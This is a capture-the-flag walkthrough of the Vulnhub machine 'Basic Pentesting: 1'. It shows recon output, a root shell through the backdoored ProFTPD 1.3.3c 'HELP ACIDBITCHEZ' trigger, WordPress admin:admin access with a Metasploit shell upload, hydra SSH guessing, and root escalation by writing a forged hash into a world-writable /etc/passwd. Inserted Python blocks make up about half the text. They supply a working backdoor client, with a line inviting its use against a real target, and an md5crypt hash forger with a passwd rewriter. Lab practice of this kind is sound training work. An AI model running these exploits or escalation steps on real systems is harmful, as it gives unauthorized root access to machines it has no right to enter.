CTF Walkthrough - Basic Pentesting: 1


Information

Intro

According to the Vulnhub description, this machine is intended for newcomers. It offers several ways to reach the goal (rooting the machine). The machine is fairly realistic (I have found similar scenarios in real-life pentests), which makes it… well, not that amusing. Still, it is a nice one for beginners to practise on!

Walkthrough

Identification and Enumeration

The first thing to do is to identify the target IP. Luckily it answers ping requests, so a quick fping sweep of the subnet is enough (-a prints only alive hosts, -q suppresses per-target errors, -g generates the target list from the CIDR range):

# fping -aqg 192.168.10.0/24
[...]
192.168.10.195

After a few seconds, fping prints a handful of IPs. The only unknown address in that list is 192.168.10.195, which should be my new guest, and therefore my target IP.

Then, as always, nmap is used to gather information about the services running on the machine (-sT full TCP connect scan, -p- all 65535 ports, -A version detection plus default scripts, -oA writes the results in all three output formats):

nmap -sT -p- -A -vvv -oA nmap 192.168.10.195
[...]
PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack ProFTPD 1.3.3c
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))

FTP

The first thing to notice is that ProFTPD 1.3.3c is the backdoored release (searchsploit points straight at it). In late 2010 the project's main distribution server was compromised and the 1.3.3c source tarball was replaced with one containing a backdoor, so everybody who downloaded it during that window got a trojaned build. Not cool! The project published a full report on the compromise.

Luckily for us, we don't need to defend the machine, only attack it. The backdoor is thoroughly documented, so we can use it directly. The manual PoC is really simple: the trojaned HELP command, when given the argument ACIDBITCHEZ, switches to uid 0 and hands out a shell on the control connection, so anything we type afterwards is executed as root. Let's try it:

# nc 192.168.10.195 21
220 ProFTPD 1.3.3c Server (vtcsec) [192.168.10.195]
HELP ACIDBITCHEZ
id;
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

That was fast: root in a few minutes. But this machine isn't over yet!
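The manual nc session above, reproduced as a small Python client. This is an added example, not code from the original post or from the ProFTPD project: it reads the banner, sends HELP ACIDBITCHEZ, then feeds the spawned shell a command and collects its output, exactly the exchange shown with nc. So it can run offline, the block also ships a constructed mock (MockBackdooredProFTPD) that imitates the trojaned server's replies; the half-second pause before sending the command is an assumption about how long the real server needs to hand the socket over to /bin/sh.

```python
"""Talk to the ProFTPD 1.3.3c 'HELP ACIDBITCHEZ' backdoor from Python.

Added example, not code from the original post. The client reproduces the
manual nc session; MockBackdooredProFTPD is a constructed stand-in for the
trojaned server so the exchange can be run and tested offline."""
import socket
import threading
import time

TRIGGER = b"HELP ACIDBITCHEZ\r\n"


def read_line(sock):
    """Read one line (without CRLF) from sock; None on EOF before any data."""
    buf = bytearray()
    while True:
        byte = sock.recv(1)
        if not byte:
            return bytes(buf).rstrip(b"\r\n") if buf else None
        buf += byte
        if byte == b"\n":
            return bytes(buf).rstrip(b"\r\n")


def probe_proftpd_backdoor(host, port=21, command="id", timeout=5.0):
    """Connect, read the banner, send the trigger and run `command` in the
    shell the backdoor spawns. Returns (banner, command_output)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        banner = read_line(sock)
        if banner is None or not banner.startswith(b"220"):
            raise RuntimeError("no FTP banner from %s:%d" % (host, port))
        sock.sendall(TRIGGER)
        # Assumption: give the server a moment to replace its FTP command loop
        # with /bin/sh, so our command is read by the shell, not by ProFTPD.
        time.sleep(0.5)
        sock.sendall(command.encode() + b"\nexit\n")
        chunks = []
        while True:
            try:
                data = sock.recv(4096)
            except socket.timeout:
                break  # shell stayed open; return what we have so far
            if not data:
                break  # 'exit' closed the connection
            chunks.append(data)
    output = b"".join(chunks).decode(errors="replace").strip()
    return banner.decode(errors="replace"), output


def looks_rooted(output):
    """True when `id` output shows the shell is running as uid 0."""
    return "uid=0(root)" in output


class MockBackdooredProFTPD(threading.Thread):
    """Constructed mock: FTP banner, '500 ... not understood' for normal
    commands, and after the trigger it answers `id` like a root shell would.
    Not real ProFTPD code; only `id` and `exit` are understood."""

    BANNER = b"220 ProFTPD 1.3.3c Server (vtcsec) [127.0.0.1]\r\n"
    ID_OUTPUT = b"uid=0(root) gid=0(root) groups=0(root),65534(nogroup)\n"

    def __init__(self):
        super().__init__(daemon=True)
        self.listener = socket.socket()
        self.listener.bind(("127.0.0.1", 0))  # the OS picks a free port
        self.listener.listen(1)
        self.port = self.listener.getsockname()[1]

    def run(self):
        conn, _ = self.listener.accept()
        self.listener.close()
        with conn:
            conn.sendall(self.BANNER)
            shell = False
            while True:
                line = read_line(conn)
                if line is None or (shell and line == b"exit"):
                    return
                if not shell:
                    if line == TRIGGER.strip():
                        shell = True  # real server: setuid(0); system("/bin/sh")
                    else:
                        conn.sendall(b"500 " + line + b" not understood\r\n")
                elif line == b"id":
                    conn.sendall(self.ID_OUTPUT)
                else:
                    conn.sendall(b"sh: 1: " + line + b": not found\n")


def demo():
    """Run the full exchange against the mock; returns (banner, output, rooted)."""
    server = MockBackdooredProFTPD()
    server.start()
    banner, output = probe_proftpd_backdoor("127.0.0.1", server.port, timeout=3.0)
    server.join(timeout=3.0)
    return banner, output, looks_rooted(output)


if __name__ == "__main__":
    print(demo())
```

Against a real target, call probe_proftpd_backdoor(target_ip) with the default port 21; the mock exists only so the exchange can be exercised without a vulnerable host.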

Of course, we can also use this backdoor through Metasploit (exploit/unix/ftp/proftpd_133c_backdoor), which saves us searching for the manual PoC. In my environment the default payload for this module (cmd/unix/reverse, calling back on port 4444) works out of the box, so this is also a super easy job:

[Screenshot: Root using Metasploit]

FTP successfully completed!

HTTP

Now this is where the machine starts to get interesting. nmap detected an Apache on port 80, let's see:

[Screenshot: Apache's "It works!" default page]

Well, not too impressive. Maybe there's something else on the web server. A quick directory brute force with dirb and its default wordlist:

# dirb 'http://192.168.10.195'

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Apr  8 22:38:47 2018
URL_BASE: http://192.168.10.195/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.10.195/ ----
+ http://192.168.10.195/index.html (CODE:200|SIZE:177)
==> DIRECTORY: http://192.168.10.195/secret/

[...]

A secret directory, that's better. This path contains a WordPress blog with the default "Hello world!" post. Maybe the administration login panel is at the default location, /secret/wp-login.php?

[Screenshot: WordPress login panel]

It is! However, something important happened: the URL is no longer an IP, the browser followed a redirect to http://vtcsec/secret/wp-login.php. WordPress stores its site URL in the database and redirects requests to it, and this install was set up with the hostname vtcsec (the same name the FTP banner showed). In my network I don't need to make further adjustments, since my DNS/DHCP server resolves the VM's hostname to the right IP. When that isn't the case, a line such as 192.168.10.195 vtcsec should be added to /etc/hosts on the attacking machine, so the web application works correctly.

Of course, the first thing to try here is the classic h4x0r technique: logging in with admin:admin. And it works!

Now, since the admin user has actual administration privileges, the easiest route is a Metasploit module that abuses those permissions to get code execution on the server (exploit/unix/webapp/wp_admin_shell_upload, for instance, does this by uploading a malicious plugin, since an administrator can install arbitrary PHP that way):

[Screenshot: Meterpreter session from WordPress]

We have a shell with limited permissions (user www-data), so we need to find a way to escalate privileges on the machine. First of all, let's retrieve /etc/passwd, just in case:

www-data@vtcsec:$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
[... system users ...]
marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
[... more system users ...]

There is a single non-system user (besides root): marlinspike. I'll take note of it, just in case.

Something else should be noted here. These are the permissions of /etc/passwd:

www-data@vtcsec:$ ls -lah /etc/passwd
-rw-rw-rw- 1 root root 2.4K Nov 16 13:02 /etc/passwd

The file is world-writable! Usually, UNIX systems split the user login information between two files: /etc/passwd, which is world-readable and holds the account data (username, UID, GID, home directory, shell) with just an x in the password field, and /etc/shadow, readable only by root, which holds the actual password hashes. When the password field in /etc/passwd is not x but a hash, the system authenticates against that hash directly and never consults /etc/shadow.

So, if we can write to /etc/passwd, we can set the password of any user, no matter what /etc/shadow says. Even root! First of all, we need to generate a password hash in crypt format (a salted MD5-crypt hash here; openssl passwd -1 -salt oatmeals delicious would produce the same kind of hash if mkpasswd is not installed):

# mkpasswd -5 delicious oatmeals
$1$oatmeals$zt2BfPPpVxqgikzNDxQRb1

Then, we change the root entry so the x in the password field is replaced by our delicious hashed password. Editing the file in place with sed -i is safer than cat /etc/passwd | sed ... > /etc/passwd, which makes the shell truncate the file before cat has read it and can leave you with an empty /etc/passwd; anchoring the pattern on ^root:x: also guarantees that only root's line is touched:

www-data@vtcsec:$ sed -i 's/^root:x:/root:$1$oatmeals$zt2BfPPpVxqgikzNDxQRb1:/' /etc/passwd
www-data@vtcsec:$ cat /etc/passwd
root:$1$oatmeals$zt2BfPPpVxqgikzNDxQRb1:0:0:root:/root:/bin/bash
[... more users ...]

And then, su to root with the new password (delicious). One caveat: su insists on a terminal, so if the meterpreter shell has none, spawn one first with python -c 'import pty; pty.spawn("/bin/bash")' (or python3) and run su from there.

[Screenshot: Shell privilege escalation]

We got root!
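The whole escalation in one place, as an added example (not the post's own commands): a from-scratch implementation of the $1$ MD5-crypt algorithm that mkpasswd -5 and openssl passwd -1 produce, a passwd rewriter that matches on the username field rather than on a loose text pattern, and the permission check that tells you whether the trick applies at all. The file contents are constructed to mirror the entries shown above; passwd_is_writable_by_others is the only function that touches the real filesystem, and it is not called by default.

```python
"""Forge a crypt(3) MD5 password hash and plant it in a world-writable
passwd file. Added example for the escalation above, not code from the
original post. md5crypt() is a from-scratch implementation of the $1$
algorithm (the crypt module is deprecated in Python 3.11 and gone in 3.13);
SAMPLE_PASSWD is constructed to mirror the entries seen on the VM."""
import hashlib
import os
import stat

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Constructed sample, not a copy of the VM's real file.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash\n"
)


def _to64(value, count):
    """crypt(3)'s base-64 variant: `count` chars, least significant 6 bits first."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password, salt):
    """Return '$1$<salt>$<hash>' as mkpasswd -5 / openssl passwd -1 would."""
    pw = password.encode()
    salt = salt.encode()[:8]  # the algorithm uses at most 8 salt bytes
    ctx = hashlib.md5(pw + b"$1$" + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    for remaining in range(len(pw), 0, -16):
        ctx.update(alt[:min(remaining, 16)])
    bits = len(pw)
    while bits:  # one byte per bit of the password length
        ctx.update(b"\0" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()
    for i in range(1000):  # stretching rounds
        c = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    order = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    encoded = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                      for a, b, c in order)
    encoded += _to64(final[11], 2)
    return "$1$%s$%s" % (salt.decode(), encoded)


def set_passwd_hash(passwd_text, user, new_hash):
    """Replace `user`'s password field (the 'x') with new_hash. Matching on the
    whole username field avoids touching e.g. 'rootkit' when editing 'root'."""
    lines = []
    found = False
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[0] == user:
            fields[1] = new_hash
            found = True
        lines.append(":".join(fields))
    if not found:
        raise KeyError("no such user in passwd: %s" % user)
    return "\n".join(lines) + "\n"


def is_world_writable(mode):
    """The check that makes this attack possible: is the 'other' write bit set?"""
    return bool(mode & stat.S_IWOTH)


def passwd_is_writable_by_others(path="/etc/passwd"):
    """Run on the target: True when /etc/passwd has the -rw-rw-rw- problem."""
    return is_world_writable(os.stat(path).st_mode)


if __name__ == "__main__":
    forged = set_passwd_hash(SAMPLE_PASSWD, "root", md5crypt("delicious", "oatmeals"))
    print(forged, end="")
```

On a target where passwd_is_writable_by_others() is true, the same two calls applied to the real file give the result shown above. Appending a second uid-0 line instead of editing root's entry is a lower-impact variant that works just as well and is easier to clean up afterwards.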

SSH

There is one more service running on the machine: SSH. However, the installed version does not appear to be vulnerable to anything we could use directly.

We did take note of an existing user, though. And password authentication is enabled, so there is no need to find a private key. What if we just let hydra guess the password…

[Screenshot: SSH login found with hydra]

Bingo!

The privilege escalation process would be exactly the same, since /etc/passwd is world-writable and the user marlinspike can write to it as well.

Final words

As its name suggests, this is a basic boot2root machine intended for beginner practice. It shows different ways into a vulnerable machine, which may be useful in your day-to-day pentesting work. For more advanced pentesters, it is not the most entertaining machine to pwn.

All done here, have a nice day!